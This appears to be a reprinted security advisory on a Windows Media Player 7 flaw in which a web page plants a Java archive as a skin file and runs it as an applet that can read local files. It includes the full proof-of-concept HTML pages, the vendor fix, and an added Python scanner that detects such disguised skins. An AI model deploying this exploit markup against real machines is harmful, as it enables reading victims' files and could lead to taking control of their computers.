COMMAND

    Media Player

SYSTEMS AFFECTED

    Windows Media Player 7

PROBLEM

    The following is based on Georgi Guninski security advisory #35.
    There is a security vulnerability in Windows Media Player 7,
    exploitable through IE and Java, which allows reading local files
    and browsing directories, which in turn allows executing arbitrary
    programs. This may lead to taking full control over the user's
    computer.

    The problem is that WMP skins are installed in a known directory
    and with a known name:

        "C:/Program files/Windows Media Player/Skins/SKIN.WMZ"

    The following tag:

        <IFRAME SRC="wmp2.wmz"></IFRAME>

    will download wmp2.wmz and place it in

        "C:/Program files/Windows Media Player/Skins/wmp2.wmz"

    wmp2.wmz may be a Java JAR archive. The following applet tag:

        <APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
        CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300>
        <PARAM NAME="URL" VALUE="file:///c:/test.txt">
        </APPLET>

    will be executed with codebase="file://c:/", and the applet will
    have read-only access to C:\.

    The code is:

        --------wmp7-3.html--------------------------------------------------
        <IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
        <SCRIPT>
        function f()
        {
        window.open("wmp7-3a.html");
        }
        setTimeout("f()",4000);
        </SCRIPT>
        ------wmp7-3a.html---------------------------------------------------
        <APPLET CODEBASE="file://c:/"
        ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class"
        WIDTH=700 HEIGHT=300>
        <PARAM NAME="URL" VALUE="file:///c:/test.txt">
        </APPLET>

    Demonstration is available at:

        http://www.guninski.com/wmp7-3.html

SOLUTION

    Disable Java. A patch is available to fix this vulnerability.
    Please read the Security Bulletin:

        http://www.microsoft.com/technet/security/bulletin/ms01-010.asp
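
    To check a machine for the condition described under PROBLEM (a Java
    archive saved under a skin name in the Skins directory), the following
    added example, which is not part of the original advisory, inspects
    .wmz files for Java class content. It relies on skin packages and JARs
    both being ZIP archives; the function names and the sample archives are
    constructed for illustration.

```python
import io
import zipfile
from pathlib import Path

CLASS_MAGIC = b"\xca\xfe\xba\xbe"  # first four bytes of every compiled Java class


def java_entries(wmz_bytes):
    """Return ZIP members that look like Java code, or None if data is not a ZIP."""
    if not zipfile.is_zipfile(io.BytesIO(wmz_bytes)):
        return None
    flagged = []
    with zipfile.ZipFile(io.BytesIO(wmz_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            encrypted = bool(info.flag_bits & 0x1)  # content unreadable without a password
            head = b"" if encrypted else zf.open(info).read(4)
            # Flag by content (class magic, whatever the name), by name, or JAR manifest.
            if (head == CLASS_MAGIC or name.lower().endswith(".class")
                    or name.upper() == "META-INF/MANIFEST.MF"):
                flagged.append(name)
    return flagged


def audit_skins_dir(skins_dir):
    """Map each .wmz file in skins_dir to its flagged members (hits only)."""
    report = {}
    for path in sorted(Path(skins_dir).iterdir()):
        if path.is_file() and path.suffix.lower() == ".wmz":
            hits = java_entries(path.read_bytes())
            if hits:
                report[path.name] = hits
    return report


def make_zip(members):
    """Build a ZIP in memory from {name: bytes}; used for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: an ordinary skin, and a JAR saved under a skin name.
CLEAN_SKIN = make_zip({"demo.wms": b"<theme/>", "bg.bmp": b"BM\x00\x00"})
JAR_AS_SKIN = make_zip({"gjavacodebase.class": CLASS_MAGIC + b"\x00\x00\x00\x2e",
                        "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"})
```

    Call audit_skins_dir() with the Skins directory named in the advisory;
    any file it reports carries Java content inside a skin package.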